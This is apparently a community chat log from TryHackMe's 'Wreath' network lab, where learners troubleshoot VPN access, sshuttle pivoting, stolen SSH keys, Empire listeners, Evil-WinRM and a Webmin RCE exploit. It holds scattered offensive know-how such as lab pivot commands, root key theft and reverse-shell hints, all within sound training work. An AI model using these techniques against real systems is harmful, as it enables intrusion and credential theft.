Also: How can I be connected to vpn and also use google? This drive me crazy that I have to switch over and over again between kali and windows ...
I saw that AttackBox doesn't have this problem
Most probably it's a setting or something
Don't use the Kali VPN client, use the openvpn command line.
There's also a checkbox somewhere in the Kali network manager for the VPN
I'm using openvpn cli but it's the same like kali VPN client
The problem persists in both ways ...
It shouldn't.
Check the routing table, make sure there aren't bad routes being added.
Hmm, let me see
Routes are the same like in AttackBox...
But what I've said, there i can access machines and also use google, or other sites in the same time.
In my machine with vpn active, I can access only machines, that's all
If you drop into #site-support, that would be a more appropriate place to ask
Thank you so much! I will
hey guys... so it is not only me, right ? i can't access the machine with openvpn
use the wreath vpn
sshuttle is working, thanks for the help!
I'm trying Task 29, but when I execute it in powershell the stager returns powershell.exe : Invoke-Expression : Cannot bind argument to parameter 'Command' because it is an empty string.
and when I try to execute it through burpsuite with the RCE exploit it wont work either
does anyone know a fix / what I'm doing wrong?
I put the php files etc on the prod-server and I made a php listening port there
you used the stager generated by empire and not the one on the task, yes?
might be some quotes shenanigans in the RCE then?
well at least not in the exploit / stager, as the exploit works fine but I don't know how to test the stager
guess I'll just fire up a local windows VM to test it
hey! just started doing wreath again and got until the part with the hop listener. Thats when my network time expired and now I cant connect to any host in the network anymore. Pinging any machine doesnt get any response and ssh doesnt work as well. Already regenerated my VPN pack, rebooted kali and voted for reset but so far nothing. Is there anyone who can help?
Guys, hello!
Trying to continue WREATH, but i can't connect to prod-serv (.200) and to git-serv (.150). Already connected to the Wreath VPN
Could you help me with it?
sshuttle
ssh: connect to host 10.200.94.200 port 22: No route to host
c : fatal: c : failed to establish ssh session (2)
same problems
@golden spoke Seems that Im on the same subnet as you, I also cant connect
Would be nice if someone could reset the network
@merry robin @oblique crag Could you guys please help us out?
Sorry guys @stoic flicker @strange bison but maybe you can help us with that problem please?
Please don't ping the admins for that @gilded grove
No
Nice support, very helpful
sorry, not terribly available atm
We are not paid to help you. Everyone here is a volunteer.
I'd say check that you aren't on another VPN
otherwise vote for a reset, don't think I can help beyond that, sorry
wreath only (
I'm just a user like you are, no special access
Reset (3/8) need 5 more votes
hmm okay, but thanks anyway!
Not sure how sshuttle works, but maybe check that you have the right key configured?
It's good, thank you
guys this shows an error while executing listener on empire
this is the info of the listener
There's already a listener with that name, it looks like.
Does anyone know if there is an issue with the private key coz im having issues ?
There can be, if someone changed it
I thought so too but the box was reset and i tried it again still same issue
I basically keep getting an error when trying to ssh into the webserver with the private key... apparently the key is invalid..i forgot the exact error message
@steady swan
Hmm
How can I help without knowing the error?
Did you do chmod 600 id_rsa?
And one more thing, did you get id_rsa or id_rsa.pub?
@silver jewel
Anyways. Ping me when you come back
I got id_rsa.....and yes i changed permissions @steady swan
So what's the error?
You remember at least a word?
Of the error?
@silver jewel
Do you go away every 30 seconds and come back after 30 minutes? Lol
Sorry about that..i am spinning up my kali box @steady swan
I see
Ping me when you come back
I might be able to help you as I completed Wreath about 4 days ago
So the error is load key "id-rsa" invalid format....im not sure how exactly its invalid since i also confirmed with darks video and they are practically the same @steady swan
I tried...about five times still got nothing @steady swan
When i tried it the machine was just reset at that time @steady swan
Which machines key are you getting?
I mean the hostname?
First of all. Tell me how you downloaded it?
Using?
I copy pasted it
Cat
Hmm I see
This??
You are attacking .200 right?
Naah..the webserver
Bro. Seriously?
You have to get root SSH keys for the prod server thing
Not the git server
Yeah..i got it at /root/.ssh
Prod
You just told me git server
Ooh..sorry..
Webminrce then revshell
Do you have a stable shell?
Yeah
Can you send a screenshot?
Cool..lemme dm you the pic then
Sure
@silver jewel you might need to convert the key if you have a different openssh version
How exactly does a different openssh version affect it? @pallid vapor
if you're getting invalid id_rsa key format, make sure it has a blank line at the end of the file, and no blank lines or spaces at the start.
It should be backwards compatible
Yeah, but should be backwards compatible.
I had that issue as well, and then I recopied the key and it was fine. you can probably set up an http server that can upload files on your attacking machine and curl it over
check the line endings, and that there's a newline at the end
You can copy paste it, but ok
I tried copy pasting but didn't work for me
It's finicky
@real shuttle
I'm in task 6, is it just me or is the id_rsa empty? pretty sure it's not supposed to be
Shouldn't be, someone might have been a terrible person
could be why there's 3 votes for a reset
It wasn't empty
That was 13 hours ago, the network reset
There are many different instances of the wreath network, so not everyone is on the same subnet. A reset for one won't affect the others.
Thanks for the clarification, I'm not very familiar with how the networks work. The file was empty on the instance I'm on but after a reset everything was perfectly fine.
Glad to hear it :).
The third octet in the IP is which network you are on. There's usually something like 10 or so people that share that network with you
Oh, I thought it'd be a lot more for some reason
I could be wrong. I think it says somewhere on the page
the number of votes needed to reset is related to the number of current users. Not sure if it's the same number or not
Didn't see anything about that, but I must admit I was too excited to get on with it
Wreath is the only network I've done, but it's definitely one of (if not THE) best rooms I've done
It does seem like a lot of fun and very educational
Hey @merry robin, just curious when do you plan to update task 4 to include the links to the reports?
I do not see the option to start/extend/reset was anything changed on that side?
@burnt pike
did you try in another browser?
Did you include the -x flag along with the ip of the compromised machine?
which command are you referring to
sshuttle
Try and exclude the ip that you use in the root@ip
okay lets see
Also that "ip" you put at the end should be a subnet, not just the ip
at first it worked with only the ip let me see if i have a screenshot for that
Hi, I lost my connection with my reverse shell in the task 6, and now I can't make the exploit run again....
Failed to connecto http://....
what should i do?
Since I cant restart the network just for me
Fixed!
It's up running again
fixed???
Have you joined Wreath network?
Yes I have joined the room
I am on a 34 day streak even
I actually downloaded the VPN file once before
But at one point my OS crashed
Try leaving Wreath room and joining again.
Is anyone else having issues connecting to the final machine? I'm literally following the walkthrough verbatim and not getting a connection. Specifically Task 21 -- not able to make a connection but my tunnel is working.
Hmm. Frustrating because I've used Evil-WinRM many times without issues but acting up here. Perhaps I'll just wait for a reset next year
Thanks for validating. I could regen a VPN key too I suppose.
Fantastic room FWIW. Probably the best I've seen on THM.
Anyone else get this error?
Same with xfreerdp?
@indigo beacon also not allowing me to make the connection
I just jumped over to Attacktive Directory to make sure I'm not doing something wrong and Evil-WinRM works fine.
If everything is fine then winrm or rdp should not be acting up
Try creating another user?
Already did, same issue :/
And I'm able to get a reverse shell as intended from that final machine to the .200 machine.
I guess I can try uploading a nc.exe binary and get a shell that way?
Probably will get flagged though.
When you say .200 you mean relay through .200 to your machine?
Yeah, I guess spoilers aren't an issue since it's a walkthrough room. I got the PowerShell reverse shell on .200 using the GitStack exploit. Created the user as instructed with proper permissions, and when I try to RDP or use winrm just stalls out
May be a dumb question, but the IP we are connecting to is the Windows machine's IP, no? For WinRM and RDP.
Yeah, windows
Okay, couldn't see any other way. May just have to wait for a reset.
Are you using sshuttle?
Yeeep
Welp gotta wait for the reset
haha yeah, thanks for the support regardless
any help?
it probably doesnt respond to ICMP
(It should respond to ICMP)
i can see the webpage the redirect to a domain after to add to host file
but i can not scan it
Hi everyone, I am on task 18 for Git Server: Pivoting. I am trying to complete the first task of using sshuttle to get into the network. I was able to RCE into the machine and grab the id_rsa of root.
But when I run the command sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.200.81.0/24 -x 10.200.81.200 I am getting "Permission denied" .
I also tested by using sudo ssh 10.200.81.200 -i id_rsa and I am getting the same result.
I already did chmod 600 id_rsa to set the id_rsa file to be read/write.
Let me know what you guys think I should do. Kinda stuck on this for last 2 days.
Does it say invalid key or something? If yes then try adding 1 or 2 new empty lines at the end of id_rsa key. Also, verify your account so you can send screenshots here.
Thanks I'll try that in a bit and let you know. Thank you
Try giving the private key a different name
Anyone able to help with this error? Task 21, gives error instead of the expected output
@indigo beacon when you spawned cmd, make sure you ran it as administrator
if you run it in a low integrity level (ex. a normal user who has local admin perms, but doesn't have the admin permissions invoked), mimikatz will fail
simple fix, right click cmd, run as admin

i have joined the wreath network room but when i go to vpn access page to download the pack it says you dont have access to any network
what can be the issue?
Try leaving Wreath room and joining again.
how to leave a room?
Click on options > leave room
Ok thanks
hello im new here. hope im welcome
Everyone is welcome
If you're new to THM, I recommend #start-here . Also, verifying with the bot is helpful. See the link below:
!docs verify
Performing Task 18: Pivoting in the room
Getting the following error, even though port 22 is open on the mentioned IP:
sshuttle -r root@10.200.105.150 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24 -x 10.200.105.150
ssh: connect to host 10.200.105.150 port 22: No route to host
c : fatal: c : failed to establish ssh session (2)
Any idea why this is occurring?
@indigo beacon every user doesn't get the same IP and subnet, if I'm not wrong
Last octet should be the same for the machines though
error fixed, it occurred bcoz the network was resetting -.-
Hii
hey @shut elm
In this room everyone is in the same network so same IPs
Actually no, there are many instances of the network. The overall layout is the same, so the last octet (200, 150, 100) stays the same, but the third octet will change from person to person.
Does anyone else run into issues downloading the Website.git directory? Everytime I try to do it my VM freezes up and then it errors out with "Error Download failed..." and also an authorization error for evil-winrm.
NVM I just said screw it and zip'd the original folder to my user desktop and downloaded from there
That doesn't sound true considering this ss, and I've seen other users exploits, etc.. in these machines
yes, they're shared with other users but it's like 10 people to a network.
You do not share a network with the hundreds or thousands of other users in Wreath at the moment, just a small number.
Generally, community mentors and mods are more familiar with how stuff works behind the scenes. I think Wreath specifically states how many people share a network at the start?
Either it doesn't or I can't read
The only indicator I saw is in the vote count for reset. I don't know if that's the exact number of people in the room, or a percentage, or what
But yeah, I think it's roughly 10 people per instance, at least from what I saw when I did wreath. I could be way off.
20%
It's currently set to either 35 or 40 per network. Can't remember which
Might even have been dropped to 25
my suspicions were correct, then :). I guessed it was a percentage
Its showing connected to the wreath network still not getting any ping response, need help
Having the same problem. Anything on how you solved it?
For me, it just doesn't respond to ICMP...
nvm it does
i am not able to find any solution
but there is one thing very weird , that there are many tun ips like tun0,tun1,tun2,...etc
Make sure you have setup your VPN connection correctly https://tryhackme.com/room/openvpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (that don't start with "grep" or sudo), do the following steps
Type sudo killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
okk thanks
@strange bison
after killing all
then again i did ps aux | grep open vpn
still it shows the same number of processes
I am trying manually
worked
Unable to create new listener on starkiller
facing this issue while installing empire
Hello,
There is a problem with wreath room, because I can't run the exploit
and i tested with the arg --force, i have the shell but i can't run the commands except "exit", so i tested to "concat" multiple commands but no result
Can you help me please ?
If someone answer me, can you ping me please. Thanks
--force doesn't mean you have a shell, @sacred linden -- it just means that it skipped the bit where it checked if it was possible to get a shell and jumped to trying (and failing) to execute commands.
Can you access the website?
yes
Can you access port 10000?
-unmute @sacred linden Accidental raid protection trigger
thanks
Np
If you can access port 10,000 then the exploit should work. What's it giving you?
(You can screenshot now, but verify properly when you can)
sorry, i executed the exploit on this port and it's failed.
I'm in the vm THM
Screenshot the network map at the top of the room
i follow the video when i saw that doesn't work
And i can ping this ip : 10.200.54.200, so i don't understand
You're attacking the wrong IP in your screenshot
Target 10.200.54.200, not 10.200.72.200 @sacred linden
OMG! Thank you very much
Np :)
actually it works much better haha
Did you start empire? Looking at your screenshot above your Starkiller command is a failed empire command. Looking at the error it's probably a python version issue
Is anyone facing the same issue?
also .200 site is not opening
vpn is on and connected
I think the server has been reset now, it's working fine for me. I was unable to SSH into the machine, but all good now (y)
Anyone else having SSH issues on 10.200.82.x?
I am facing a problem in listening windows using burpsuite
Host name windows
Host ip 10.200.51.150
Hey guys, I am trying to ssh into wreath but I am having issues. I used the RCE exploit from muirland to get into the .200 server and copied the /root/.ssh/id_rsa file from the server to my attacking machine. Then did chmod 600 id_rsa to make sure the file could be used.
But when I run "sudo ssh -i id_rsa root@10.200.81.200" I am still getting this message:
root@10.200.81.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
I looked at previous messages on this chat. But can't find the solution. I also looked at a walkthrough online on YouTube and know I am doing the right steps.
Is there something I'm missing? I also voted to restart the machine. Not sure if that will resolve it.
I also deleted any spacing or new lines at the end of the ssh private key file with nano
Which user did u chmod 600 with?
I think you should run ssh as that user because only that user can read the id_rsa file u copied over
Yeah only the user that you created the id_rsa file with can read said file so run ssh as that user
@sweet valve
got it will try again
Also, add 1 or 2 new line at the end of id_rsa and try again.